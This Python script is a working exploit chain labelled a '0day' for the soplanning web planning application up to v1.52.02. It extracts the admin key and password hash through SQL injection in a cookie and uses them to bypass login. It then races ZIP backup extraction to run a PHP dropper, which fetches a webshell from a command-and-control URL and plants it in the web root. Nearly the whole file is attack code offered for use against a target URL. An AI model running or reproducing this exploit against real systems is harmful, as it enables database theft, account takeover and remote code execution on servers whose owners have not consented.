import argparse
import os
import requests
import threading
import time
import zipfile


# This variable is used to manage the verbosity of the exploit.
DEBUG = 0

# This variable represents the value, in bytes, of the maximum size our archive
# can be.
MAX_SIZE_UPLOAD = 20971520

# Name of folder to be compressed as archive.
FOLDER_TO_BE_COMPRESSED = "Archive"
if not os.path.exists(FOLDER_TO_BE_COMPRESSED):
   os.makedirs(FOLDER_TO_BE_COMPRESSED)

# Name of archive when created locally.
LOCAL_ARCHIVE_NAME = "archive.zip"

# Remote folder corresponding to the archive being extracted.
REMOTE_FOLDER_PATH = f"www/upload/backup/{LOCAL_ARCHIVE_NAME}.tmp/"

# Name of dropper in archive.
DROPPER_NAME = "dropper.php"

# Webshell name when dropped.
WEBSHELL_NAME = "webshell.php"

# Directory in which webshell is to be written.
WEBSHELL_PATH = "../../../../"

# String used to check that Webshell is executing correctly.
WEBSHELL_CHECK = "a6ed2b7033a44688f0b5aae4fa868f2e"

# Webshell content retrieved from C2.
WEBSHELL_C2_URL = "http://host.docker.internal:8000/webshell.php"

# Dropper content in PHP.
DROPPER_CONTENT = f"<?php echo __FILE__; file_put_contents('{WEBSHELL_PATH}{WEBSHELL_NAME}', file_get_contents('{WEBSHELL_C2_URL}')); ?>"

# Name of the junk file to maximize Race Condition window exploitation time.
JUNK_FILE_NAME = "junk"

# This variable configures the forwarding of HTTP requests to the Burp proxy.
PROXIES= {} # Raw
# PROXIES = {"http": "http://127.0.0.1:1338"} # Lab
# PROXIES = {"http": "http://127.0.0.1:1348"} # Pentest

# Current process PID.
CURRENT_PROCESS_PID = os.getpid()


# This function extracts the data between two delimiters.
def extract(raw, start_delimiter, end_delimiter):
    # The first delimiter is searched for.
    start = raw.find(start_delimiter)
    if start == -1:
        if DEBUG > 1:
            print("[x] Error: function \"extract()\" failed (can't find starting delimiter).")
        return None
    start = start + len(start_delimiter)
    # The second delimiter is searched for.
    end = raw[start::].find(end_delimiter)
    if end == -1:
        if DEBUG > 1:
            print("[x] Error: function \"extract()\" failed (can't find end delimiter).")
        return None
    end += start
    return raw[start:end]


# This function creates a malicious archive maximizing the chances of successful
# exploitation of the race condition. It takes as parameter "output" the path of
# the output file (archive) and as "input" the path of the folder to be compressed.
def create_malicious_archive(output=LOCAL_ARCHIVE_NAME, input=FOLDER_TO_BE_COMPRESSED):
    print(f"[*] Creating archive \"{output}\" from folder \"{input}\" ...")
    # Create a new zip file.
    if os.path.exists(LOCAL_ARCHIVE_NAME):
        os.remove(LOCAL_ARCHIVE_NAME)
    archive = zipfile.ZipFile(LOCAL_ARCHIVE_NAME, "w")
    archive.write(f"{input}/{JUNK_FILE_NAME}", os.path.basename(f"{input}/{JUNK_FILE_NAME}"))
    archive.close()
    # We subtract 1 from the MAX_SIZE_UPLOAD value because we want to pass the
    # test from the PHP script "upload_backup.php".
    while os.stat(LOCAL_ARCHIVE_NAME).st_size > MAX_SIZE_UPLOAD - 1:
        os.remove(LOCAL_ARCHIVE_NAME)
        archive = zipfile.ZipFile(LOCAL_ARCHIVE_NAME, "w")
        # Add the dropper file to the zip file.
        archive.write(f"{input}/{DROPPER_NAME}", os.path.basename(f"{input}/{DROPPER_NAME}"))
        # Add the junk file to the zip file.
        archive.write(f"{input}/{JUNK_FILE_NAME}", os.path.basename(f"{input}/{JUNK_FILE_NAME}"))
        archive.close()
        # We check the final size of the archive and if it's too large, we
        # truncate the junk file.
        if os.stat(LOCAL_ARCHIVE_NAME).st_size > MAX_SIZE_UPLOAD - 1:
            os.truncate(f"{input}/{JUNK_FILE_NAME}", os.stat(LOCAL_ARCHIVE_NAME).st_size - 500)
        else:
            break
    print(f"[*] Archive \"{output}\" (size={os.stat(output).st_size}) written.")


# This function writes the dropper in PHP to a folder (before it is compressed
# into an archive). It takes the path of the output file as a parameter as well
# as the content to be written.
def create_dropper_file(output=f"{FOLDER_TO_BE_COMPRESSED}/{DROPPER_NAME}", content=DROPPER_CONTENT):
    print(f"[*] Writting dropper file \"{output}\" (size={len(content)}) ...")
    with open(output, "w") as f:
        f.write(content)
    print(f"[*] Dropper written.")


# This function generates a junk file which will be used to increase the size of
# the archive in order to increase the window exploitation time.
def create_junk_file(output=f"{FOLDER_TO_BE_COMPRESSED}/{JUNK_FILE_NAME}", size=MAX_SIZE_UPLOAD):
    print(f"[*] Writting junk file \"{output}\" (size={size}) ...")
    junk_file_content = b""
    with open("/dev/urandom", "rb") as f:
        junk_file_content = f.read(size)
    with open(output, "wb") as f:
        f.write(junk_file_content)
    print(f"[*] Junk file written.")


class Exploit:
    # Use a session to avoid having to manage cookies.
    s = requests.session()
    # Credentials for authentication if needed.
    login_name = None
    login_password = None
    # Secrets required for authentication bypass.
    password = None

    def __init__(self, url, username="", password=""):
        if url[-1] != "/":
            self.url = f"{url}/"
        else:
            self.url = url
        self.username = username
        self.password = password

    # This function lets you follow the flow of the exploit chain.
    def run(self):
        # Step 1: Checks on the possibility of entering the website.
        if not(self.check_public() or self.login()):
            return 0

        # Step 2: Use SQL injection to extract information from the database 
        # (column password a hash and column key) for the user "admin".
        for [column, expected_length] in [["cle", 32,], ["password", 40]]:
            value = "".join([self.inject_sql(column, 1, 16), self.inject_sql(column, 17, 40)])
            if len(value) != expected_length:
                if DEBUG:
                    print(
                        f"[x] The extracted value ({value}) is not in the expected "
                        f"format (string of length {expected_length})."
                    )
                return 0
            if DEBUG:
                print(f"[*] column \"{column}\": {value}")
            if column == "cle": self.password = f"{value}|"
            if column == "password": self.password += value
        self.username = "admin"

        # Step 3: Use the information extracted from the database to exploit an
        # authentication bypass.
        if not self.login():
            return 0

        # Step 4: Here we exploit the Race Condition when uploading the ZIP file.
        # We'll create two concurrent threads, one to upload the file, the other
        # to trigger the dropper during ZIP extraction.
        create_dropper_file()
        create_junk_file()
        create_malicious_archive()

        self.threads = []
        self.threads.append(threading.Thread(target=self.upload_archive, args=[]))
        self.threads.append(threading.Thread(target=self.trigger_dropper, args=[]))
        self.threads.append(threading.Thread(target=self.webshell_check, args=[]))

        for thread in self.threads:
            thread.start()
        for thread in self.threads:
            thread.join()

        return 1

    # This function is used before authentication within soplanning to check if
    # visiting as "public" is allowed.
    def check_public(self):
        new_url = f"{self.url}www/index.php"
        r = self.s.get(
            url=new_url,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )

        if r.status_code != 200:
            if DEBUG:
                print("[x] Status code not expected (expected: 200).")
            return 0
        public = extract(
            r.text,
            '<a href="planning.php?public=1">',
            '<'
        )
        if not public:
            print("[x] It is not possible to visit the site as \"public\".")
            return 0

        new_url = f"{self.url}www/planning.php?public=1"
        r = self.s.get(
            url=new_url,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )

        return 1

    # This function allows you to authenticate yourself into the application.
    def login(self):
        # If the username is set to "admin", the authentication bypass is
        # exploited with as password secrets extracted from the database.
        new_url = f"{self.url}www/process/login.php"
        datas = {
            "login": self.username,
            "password": self.password
        }
        r = self.s.post(
            url=new_url,
            data=datas,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )

        if r.status_code != 302:
            print("[x] Status code not expected (expected: 302).")
            return 0

        if r.headers["Location"] != "../planning.php":
            print("[x] \"Location\" header value is incorrect (expected: \"../planning.php\").")
            return 0

        if DEBUG:
            print(f"[*] Authentication successful (authenticated as: {self.username})")
        return 1

    # This function exploits the SQL injection.
    def inject_sql(self, column, start_of_substring, end_of_substring):
        new_url = f"{self.url}www/planning.php"

        sql_query  = ""
        sql_query += f"SELECT SUBSTR({column}, {start_of_substring}, {end_of_substring})" 
        sql_query += "FROM planning_user WHERE user_id='ADM'"

        malicious_cookie = requests.cookies.create_cookie("filtreGroupeProjet",f"[\"') AND ExtractValue('',concat('=AAAA',({sql_query})))-- -'\"]")
        self.s.cookies.set_cookie(malicious_cookie)
        r = self.s.post(
            url=new_url,
            allow_redirects=False,
            verify=False,
            proxies=PROXIES
        )

        if r.status_code != 200 or r.text.find("Uncaught mysqli_sql_exception:") == -1:
            if DEBUG:
                print("[x] SQL injection failed.")
            return 0

        if DEBUG > 1:
            print("[*] SQL injection is a success.")

        return extract(
            r.text,
            "'=AAAA",
            "'"
        )

    # This function uploads a malicious archive containing a dropper.
    def upload_archive(self):
        print(f"[*] Start thread uploading malicious archive ...")
        new_url = f"{self.url}www/process/upload_backup.php"
        datas = {
            "type": "upload",
            "type_restauration": "sauvegarde"
        }
        files = {
            "fichier-0": open(LOCAL_ARCHIVE_NAME, "rb")
        }
        while 1:
            r = self.s.post(
                url=new_url,
                data=datas,
                files=files,
                allow_redirects=False,
                verify=False,
                proxies=PROXIES
            )

            time.sleep(1)

    # This function triggers the dropper execution and consequently writes the
    # webshell to the system.
    def trigger_dropper(self):
        print(f"[*] Start thread triggering dropper ...")
        new_url = f"{self.url}{REMOTE_FOLDER_PATH}{DROPPER_NAME}"
        while 1:
            try:
                r = requests.get(
                    url=new_url,
                    allow_redirects=False,
                    verify=False,
                    proxies=PROXIES,
                    timeout=0.2
                )
            except:
                pass

    # This function verifies that a webshell has been written to the root of
    # soplanning CMS.
    def webshell_check(self):
        print(f"[*] Start thread checking for webshell presence ...")
        new_url = f"{self.url}{WEBSHELL_NAME}"
        condition = 0
        while not condition:
            r = requests.get(
                url=new_url,
                allow_redirects=False,
                verify=False,
                proxies=PROXIES,
            )
            if r.status_code == 200 and r.text.find(WEBSHELL_CHECK) != -1:
                condition = 1
        print("[+] Exploit succeed.")
        print(f"[+] Webshell URL:\n\t- {new_url}")
        os._exit(0)


def main(options):
    attack = Exploit(options["url"], options["username"], options["password"])
    if not attack.run():
        print("[x] Exploit failed.")
        exit(-1)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="soplanning <= v1.52.02 0day exploit.")
    parser.add_argument("url", help="Target's URL.")
    parser.add_argument("--username", help="Username for logging on to the Web interface.")
    parser.add_argument("--password", help="Password for logging on to the Web interface.")
    args = parser.parse_args()

    options = {}
    options["url"] = args.url
    options["username"] = args.username
    options["password"] = args.password
    main(options)
